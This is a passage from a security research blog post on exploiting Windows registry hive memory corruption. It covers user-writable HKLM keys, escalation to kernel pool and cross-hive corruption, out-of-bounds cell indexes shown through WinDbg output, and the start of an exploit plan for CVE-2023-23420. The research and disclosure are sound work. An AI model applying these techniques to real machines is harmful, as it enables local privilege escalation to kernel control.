the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should be ultimately able to obtain a list of potential keys that can be used to corrupt a system hive. Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include: HKLM\SOFTWARE\Microsoft\CoreShell HKLM\SOFTWARE\Microsoft\DRM HKLM\SOFTWARE\Microsoft\Input\Locales          (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Input\Settings         (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Shell\Oobe HKLM\SOFTWARE\Microsoft\Shell\Session HKLM\SOFTWARE\Microsoft\Tracing                (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Windows\UpdateApi HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX HKLM\SOFTWARE\WOW6432Node\Microsoft\DRM HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing HKLM\SYSTEM\Software\Microsoft\TIP             (and some of its subkeys) HKLM\SYSTEM\ControlSet001\Control\Cryptography\WebSignIn\Navigation HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings HKLM\SYSTEM\ControlSet001\Control\USB\AutomaticSurpriseRemoval HKLM\SYSTEM\ControlSet001\Services\BTAGService\Parameters\Settings As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind. Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn't been fixed so far. This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to: Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user's permissions.Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario. As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security. In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.Abusing regf inconsistency to trigger kernel pool corruption While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures. For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.  However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur. This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.Inter-hive memory corruption So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.Other hive mappings in the user space of the Registry process Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below. 0: kd> !process 0 0 **** NT ACTIVE PROCESS DUMP **** PROCESS ffffa58fa069f040     SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000     DirBase: 001ae002  ObjectTable: ffffe102d72678c0  HandleCount: 3077.     Image: System PROCESS ffffa58fa074a080     SessionId: none  Cid: 007c    Peb: 00000000  ParentCid: 0004     DirBase: 1025ae002  ObjectTable: ffffe102d72d1d00  HandleCount:     Image: Registry [...] 0: kd> .process ffffa58fa074a080 Implicit process is now ffffa58f`a074a080 WARNING: .cache forcedecodeuser is not enabled 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa207f740  5        152e7a20        152e7a2f               0 Mapped       READONLY           \Windows\System32\config\SAM ffffa58fa207dbc0  4        152e7a30        152e7b2f               0 Mapped       READONLY           \Windows\System32\config\DEFAULT ffffa58fa207dc60  5        152e7b30        152e7b3f               0 Mapped       READONLY           \Windows\System32\config\SECURITY ffffa58fa207d940  3        152e7b40        152e7d3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207dda0  5        152e7d40        152e7f3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] ffffa58fa207e840  5        152ec940        152ecb3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207b780  3        152ecb40        152ecd3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa0f98ba0  5        152ecd40        152ecd4f               0 Mapped       READONLY           \EFI\Microsoft\Boot\BCD ffffa58fa3af5440  4        152ecd50        152ecd8f               0 Mapped       READONLY           \Windows\ServiceProfiles\NetworkService\NTUSER.DAT ffffa58fa3bfe9c0  5        152ecd90        152ecdcf               0 Mapped       READONLY           \Windows\ServiceProfiles\LocalService\NTUSER.DAT ffffa58fa3ca3d20  1        152ecdd0        152ece4f               0 Mapped       READONLY           \Windows\System32\config\BBI ffffa58fa2102790  6        152ece50        152ecf4f               0 Mapped       READONLY           \Users\user\NTUSER.DAT ffffa58fa4145640  5        152ecf50        152ed14f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa4145460  6        152ed150        152ed34f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412a520  4        152ed350        152ed44f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412c5a0  6        152ed450        152ed64f               0 Mapped       READONLY           \Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat ffffa58fa4e8bf60  5        152ed650        152ed84f               0 Mapped       READONLY           \Windows\appcompat\Programs\Amcache.hve In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them. However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory. For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key. This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout: 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa67b44c0  8        15280000        152801ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5b40  7        15280200        152803ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b46a0  8        15280400        152805ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b6540  6        15280600        152807ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5dc0  8        15280800        152809ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b4560  7        15280a00        15280bff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b6900  8        15280c00        15280dff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5280  5        15280e00        15280fff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5e60  8        15281000        152811ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b7800  7        15281200        152813ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8de0  8        15281400        152815ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b8840  6        15281600        152817ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8980  8        15281800        152819ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 512 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result: 0: kd> db 0x15280400000-30 00000152`803fffd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803fffe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803ffff0  41 41 41 41 41 41 41 41-41 41 41 41 00 00 00 00  AAAAAAAAAAAA.... 00000152`80400000  68 62 69 6e 00 f0 bf 0c-00 40 00 00 00 00 00 00  hbin.....@...... 00000152`80400010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ 00000152`80400020  20 c0 ff ff 42 42 42 42-42 42 42 42 42 42 42 42   ...BBBBBBBBBBBB 00000152`80400030  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB 00000152`80400040  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other. After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.Attacking adjacent memory in pool-based hive mappings Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows: All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.The entire HKLM\SYSTEM hive, including both its stable and volatile parts.All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.Volatile storage space of every active hive in the system. The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below: This behavior can be further verified on a specific example. Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command: 0: kd> !reg hivelist --------------------------------------------------------------------------------------------------------------------------------------------- |     HiveAddr     |Stable Length|    Stable Map    |Volatile Length|    Volatile Map    |     BaseBlock     | FileName  --------------------------------------------------------------------------------------------------------------------------------------------- [...] | ffff82828fc1a000 |      ee000  | ffff82828fc1a128 |       5000    |  ffff82828fc1a3a0  | ffff82828f8cf000  | \??\C:\Users\user\ntuser.dat [...] As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let's try to find the second page of this hive region in memory by translating its corresponding cell index: 0: kd> !reg cellindex ffff82828fc1a000 80001000 Map = ffff82828fc1a3a0 Type = 1 Table = 0 Block = 1 Offset = 0 MapTable     = ffff82828fe6a000  MapEntry     = ffff82828fe6a018  BinAddress = ffff82828f096009, BlockOffset = 0000000000000000 BlockAddress = ffff82828f096000  pcell:  ffff82828f096004 It is a kernel-mode address, as expected. We can dump its contents to verify that it indeed contains registry data: 0: kd> db ffff82828f096000 ffff8282`8f096000  68 62 69 6e 00 10 00 00-00 10 00 00 00 00 00 00  hbin............ ffff8282`8f096010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ ffff8282`8f096020  38 ff ff ff 73 6b 00 00-20 10 00 80 20 10 00 80  8...sk.. ... ... ffff8282`8f096030  01 00 00 00 b0 00 00 00-01 00 04 88 98 00 00 00  ................ ffff8282`8f096040  a4 00 00 00 00 00 00 00-14 00 00 00 02 00 84 00  ................ ffff8282`8f096050  05 00 00 00 00 03 24 00-3f 00 0f 00 01 05 00 00  ......$.?....... ffff8282`8f096060  00 00 00 05 15 00 00 00-dc be 84 0b 6c 21 35 39  ............l!59 ffff8282`8f096070  b9 d0 84 88 ea 03 00 00-00 03 14 00 3f 00 0f 00  ............?... Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk'). Now, let's see what the !pool command tells us about this address: 0: kd> !pool ffff82828f096000 Pool page ffff82828f096000 region is Paged pool *ffff82828f096000 : large page allocation, tag is CM16, size is 0x1000 bytes                 Pooltag CM16 : Internal Configuration manager allocations, Binary : nt!cm We are dealing with a paged pool allocation of 0x1000 bytes requested by the Configuration Manager. And what is located right behind it? 0: kd> !pool ffff82828f096000+1000 Pool page ffff82828f097000 region is Paged pool *ffff82828f097000 : large page allocation, tag is Obtb, size is 0x1000 bytes                 Pooltag Obtb : object tables via EX handle.c, Binary : nt!ob 0: kd> !pool ffff82828f096000+2000 Pool page ffff82828f098000 region is Paged pool *ffff82828f098000 : large page allocation, tag is Gpbm, size is 0x1000 bytes                 Pooltag Gpbm : GDITAG_POOL_BITMAP_BITS, Binary : win32k.sys The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.The ultimate primitive: out-of-bounds cell indexes The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes. As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table: The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map                             ->Directory[(Index >> 21) & 0x3FF]                             ->Table[(Index >> 12) & 0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; } The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below: What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green). This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below: In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors. On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout: 0: kd> dt _HMAP_ENTRY nt!_HMAP_ENTRY    +0x000 BlockOffset      : Uint8B    +0x008 PermanentBinAddress : Uint8B    +0x010 MemAlloc         : Uint4B And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options. If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following: The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. This is because of two reasons: first, due the layout of the _HMAP_ENTRY structure (i.e. 0x18-byte alignment and the need for a 0x0 value being adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides some good foundation for our exploit, but it does require additional experimentation to get every technical detail right. Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields: 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) : 0xffff82828fc1a3a0 [Type: _HMAP_TABLE * *]     0xffff82828fe6a000 [Type: _HMAP_TABLE *] 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm) (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)                     : 0xffff82828fc1b038 [Type: _CM_RM * *]     0xffff82828fdcc8e0 [Type: _CM_RM *] In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18). 0: kd> dx (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive) (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)                 : 0xffff82828fdcc930 [Type: _CMHIVE * *]     0xffff82828fc1a000 [Type: _CMHIVE *] So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3. Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure. 0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0+3*0x18 nt!_HMAP_ENTRY    +0x000 BlockOffset      : 0    +0x008 PermanentBinAddress : 0xffff8282`8fc1a000    +0x010 MemAlloc         : 0 The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zero'ed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example. We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function: >>> def MakeCellIndex(storage, directory, table, offset): ...     print("0x%x" % ((storage << 31) | (directory << 21) | (table << 12) | offset)) ... And then pass the values we have established so far: >>> MakeCellIndex(1, 0x193, 3, 0) 0xb2603000 >>> So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended. 0: kd> !reg cellindex ffff82828fc1a000 b2603000 Map = ffff82828fc1a3a0 Type = 1 Table = 193 Block = 3 Offset = 0 MapTable     = ffff82828fdcc8e0  MapEntry     = ffff82828fdcc928  BinAddress = ffff82828fc1a000, BlockOffset = 0000000000000000 BlockAddress = ffff82828fc1a000  pcell:  ffff82828fc1a004 Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.Writing the exploit At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.Step 0: Choosing the vulnerability Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.CVE-2022-34707 The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes. Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.CVE-2023-23420 This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations. In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle. So let's get to work!Step 1: Abusing the UAF to establish dynamically-controlled value cells Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout: At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent. Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps: Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).Committing the entire transaction by calling the NtCommitRegistryTransaction syscall. After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly: We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome: All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps: Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key. At this stage, it is not important that the key node is entirely 